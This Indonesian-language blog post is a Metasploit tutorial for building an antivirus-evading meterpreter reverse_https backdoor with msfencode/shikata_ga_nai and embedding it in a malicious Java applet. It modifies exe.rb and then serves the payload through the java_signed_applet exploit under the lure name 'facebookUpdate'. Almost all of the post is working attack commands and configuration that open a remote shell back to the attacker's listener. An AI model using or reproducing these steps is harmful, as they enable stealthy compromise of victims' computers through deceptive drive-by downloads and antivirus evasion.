Sebenarnya simple sekali purpose dan tutorial ini, membuat malicious URL seperti yang dilakukan SET secara manual dan menempatkan backdoor sesuai dengan keinginan kita. Karena secara default backdoor yagn di buat oleh malicious java server seperti rhinno dan java_signed_applet biasanya merupakan backdoor biasa yang mudah sekali di block antivirus ...
Ide yang baik sekali untuk memodifikasi file exe.rb dimana backdoor yang di packing dengan ekstensi java "jar" dapat diarahkan sesuai dengan backdoor yang telah kita kombinasikan dengan "msfencode"
Tutorial ini sana buat dengan Backtrack .. sekali lagi anda tinggal menyesuaikan dengan path metasploit dan direktori anda .. karena pada dasarnya semua OS yang terinstall metasploit msf adalah sama ...
Pertama-tama kita buat backdoor untuk bypass av seperti avg,avira,avast dll
ketikkan perintah sebagai berikut
root@dvildance:/# msfpayload windows/meterpreter/reverse_https LHOST=192.168.2.4 PORT=4444R | msfencode -e x86/shikata_ga_nai -c 10 -t exe -o /root/dvil.exe
yup dont forget ya agar membuat outputnya ke /root coz itu yang kita pasang di script exe.rb nanti
sekarang waktunya untuk mengdit exe.rb
buka terminal lalu ketikkan perintah selanjutnya
root@dvildance:~# cd /opt/metasploit/msf3/lib/msf/util
root@dvildance:/opt/metasploit/msf3/lib/msf/util# ls
exe.rb svn.rb
root@dvildance:/opt/metasploit/msf3/lib/msf/util# vim exe.rb
lalu edit di bagian jar
sehingga menjadidef
self
.to_jar(exe, opts={})
spawn = opts[
:spawn
] ||
2
exe_name = Rex::Text.rand_text_alpha(
8
) +
".exe"
zip = Rex::Zip::Jar.
new
paths = [
[
"metasploit"
,
"Payload.class"
],
]
def
self
.to_jar(exe, opts={})
exe =
File
.read(
"/root/dvil.exe"
)
spawn = opts[
:spawn
] ||
2
exe_name = Rex::Text.rand_text_alpha(
8
) +
".exe"
zip = Rex::Zip::Jar.
new
paths = [
[
"metasploit"
,
"Payload.class"
],
]
lihat yang tulisan merah itu adalah letak backdoor yangtelah kita buat tadi dengan shikata ga nai
Kalau semua persiapan sudah selesai .. kita buat exploit + listenernya .. memang sudah sepaket.
buka metasploit dengan msfconsole lalu ketikkan exploitnya
msf > use exploit/multi/browser/java_signed_applet (pilih exploit ini)
msf exploit(java_signed_applet) >set payload windows/meterpreter/reverse_https (set payload .. kudu harus sama dengan backdoor awal
msf exploit(java_signed_applet) > set URIPATH / (untuk path malicious url .. exp. http://192.168.1.9/ )
msf exploit(java_signed_applet) > set SRVPORT 80 (port standart malicious server .. di sarankan port 80 biar langsung kebuka)
msf exploit(java_signed_applet) > set SRVHOST 192.168.1.9 ( lokal ip server malicious kita )
msf exploit(java_signed_applet) > set LHOST 192.168.1.9 ( ip lokal untuk listener)
msf exploit(java_signed_applet) > set APPLETNAME facebookUpdate (Nama paket jar yang akan di injection ke target)
msf exploit(java_signed_applet) > set CERTCN facebookUpdate (sertifikat java)
msf exploit(java_signed_applet) >exploit (mulai exploit )
No comments:
Post a Comment